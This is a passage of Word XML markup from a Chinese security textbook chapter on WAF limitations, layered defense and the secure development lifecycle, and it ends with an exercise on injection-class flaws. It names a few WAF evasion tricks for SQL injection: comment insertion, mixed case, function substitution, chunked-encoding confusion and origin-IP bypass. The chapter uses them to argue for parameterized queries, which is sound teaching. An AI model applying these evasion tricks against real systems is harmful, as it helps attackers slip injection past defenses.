        <w:t xml:space="preserve">WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">签名库试图穷举恶意字符串的变形，但攻击者可通过等价语义转化穿越防线。例如，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入的防御历史中，攻击者开发出在关键字中间插入注释符（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UN/**/ION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）、使用大小写混合（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UnIoN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）、利用等效函数替代（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">substring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">换</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）等方法。即使在最新的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF-as-a-Service </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境中，结合非标准</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头绕过、分块传输编码混淆等技巧，绕过率仍不可忽视。这印证了第九章的核心原则：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">可以提升攻击成本，但无法根除注入类漏洞的根源——代码中数据与指令的边界混淆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。防御的着力点必须放在参数化查询和输出编码上。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">其三，WAF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">自身成为被攻击面。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">云</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">依赖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解析指向或反向代理架构，若配置不当，攻击者可能通过寻找源站真实</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">绕过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">直接对后端发起攻击。此外，WAF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对畸形超大请求、特定编码攻击的解析差异可能导致绕过，历史上甚至出现过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF Management </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">接口自身的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框（WAF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">部署与蓝队策略）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">部署模式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：WAF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不应被配置为“护城河内唯一防线”。在架构上应遵循“WAF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">前置过滤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用层安全编码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">运行时自保护（RASP）监测”的分层防御。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">监控与响应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：蓝队应将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">产生的告警作为一类信号源接入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM（安全信息与事件管理）系统。尤其是针对某个参数的多次变形尝试，即便未成功穿透，也表明攻击者在进行“侦察性绕过”测试，应触发人工分析。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">常规验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：定期使用白盒与灰箱测试方法，对线上</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则进行有效性校验，并结合内部发现的漏洞修复</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则，但永远将修复应用代码中的漏洞设为最高优先级工单。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="226"/>
    <w:bookmarkStart w:id="227" w:name="安全开发生命周期sdl防御左移"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全开发生命周期（SDL）：防御左移</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">面对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">之间的攻防博弈，最根本的扭转力量的来源在于将安全活动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">左移至软件开发生命周期（SDL，Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Development </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lifecycle）的早期阶段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，使得安全成为设计属性而非事后补丁。SDL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的理念在微软等大型组织实践中被系统化为“安全即过程”——在需求分析、架构设计、编码实现、测试验证、部署运维的每个阶段嵌入安全审查。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在本书的攻防对称框架下，SDL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不是空洞的合规清单，而是对攻击技术演进的镜像响应：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">需求与设计阶段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：进行威胁建模，帮助团队在开发前系统性思考“谁可能攻击我们、通过什么路径、会造成什么伤害”。例如，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE（Spoofing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份伪造、Tampering</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据篡改、Repudiation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">抵赖、Information</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Disclosure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信息泄露、Denial</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of Service </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">拒绝服务、Elevation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of Privilege </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权）方法遍历待设计的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">API，重点关注越权（属于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Elevation of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege）与信息泄露（Information</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Disclosure）。设计阶段的产出包括“认证授权矩阵”——明确每一类用户角色对每个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端点及资源的作用域。这一矩阵是后续开发与测试中防御</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BOLA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的依据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">编码实现阶段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：建立安全编码规范与代码审查清单，通过静态应用安全测试（SAST，Static</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Application Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing）在集成前发现漏洞。例如，针对前面提及的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BOLA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御，安全检查点需明确：所有直接引用数据对象（数据库行、文件、消息队列记录）的参数，在用于查询前是否进行了与当前会话用户的归属校验？这种校验不应散落在各处，而应抽象为统一的“数据签名或访问代理层”，避免开发者遗忘。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">测试与验证阶段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：结合动态应用安全测试（DAST，Dynamic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Application Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing）与手动渗透测试，验证</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否存在运行时漏洞。DAST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">工具可自动化地发送包含各种注入向量、越权变种与畸形数据的请求并分析响应。SDL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">要求对测试发现的高、中、低风险漏洞设定修复时间</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SLA（例如高危漏洞需在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 72 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小时内完成修复代码并发布），且修复后必须进行回归测试。这也是“演习”贯穿全过程的载体。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">运维与反馈阶段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将生产环境中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的拦截数据、接口的异常请求模式、实例崩溃的转储信息回传至开发团队，作为下一次迭代威胁建模的输入。这种“检测→响应→学习→设计改进”的闭环，正是安全工程区别于一次性渗透测试的关键所在。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御总览框（本节收口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> — API · WAF · SDL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">纵深防御体系）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">至此，可以将防御体系抽象为一个同心圆，由外向内层层削减攻击者的执行空间：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">认证与授权（决策核心层）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对每一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端点，服务端独立校验调用方身份（认证）与操作权限（授权），尤其要实施对象级授权校验。这是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全的基石，任何外部防护都不能替代。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">输入校验与规范化（数据边界层）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在解析外部数据的最外层固守数据与代码边界——使用严格的白名单校验、数据类型强制转换、结构化数据模式验证（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JSON </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Schema），并确保应用所处理的每一个外部值均不进入执行上下文（详见第九章关于参数化查询的论述）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">速率限制与资源控制（业务稳定层）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对敏感操作（登录、数据导出、批量查询）实施基于用户、令牌或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的速率限制，防止暴力攻击与数据爬取。该层同时防御业务逻辑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DoS。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">WAF（信号过滤与攻击检测层）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：作为语法层面的前置过滤器，阻挡已知特征的恶意流量，并在攻击探测阶段为蓝队提供早期预警信号。承认其可被绕过性，不依赖其“根治”漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SDL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">安全左移（过程保障与治理层）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：通过威胁建模、SAST/DAST、代码审查和安全回归测试，将上述所有技术控制项前移并固化到开发流程中，确保安全不再是发布前的急救措施，而是常态化、可验证的软件质量属性。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="227"/>
    <w:bookmarkStart w:id="228" w:name="习题-13"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以下提取题旨在检验对本章核心假设与防御逻辑的迁移理解。先独立作答，再对照解答与提示。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1133"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题：反序列化与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SSTI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的共同被违反假设</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结合第十二章前述内容，分析“不安全的反序列化”与“服务端模板注入（SSTI）”两种漏洞，尽管利用链路截然不同，但共同违反了什么样的根本安全假设？为什么会与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入在逻辑上被归入“注入类”的大家庭？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答与提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：它们共同违反了“不可信数据不进入具备强大表达能力的执行上下文或对象创建过程”这一根本假设。SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入是因为外部输入被拼接到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行上下文中；SSTI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
